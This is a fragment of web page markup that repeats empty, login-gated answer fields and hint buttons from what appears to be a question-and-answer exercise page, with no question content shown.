<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="7" name="7" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
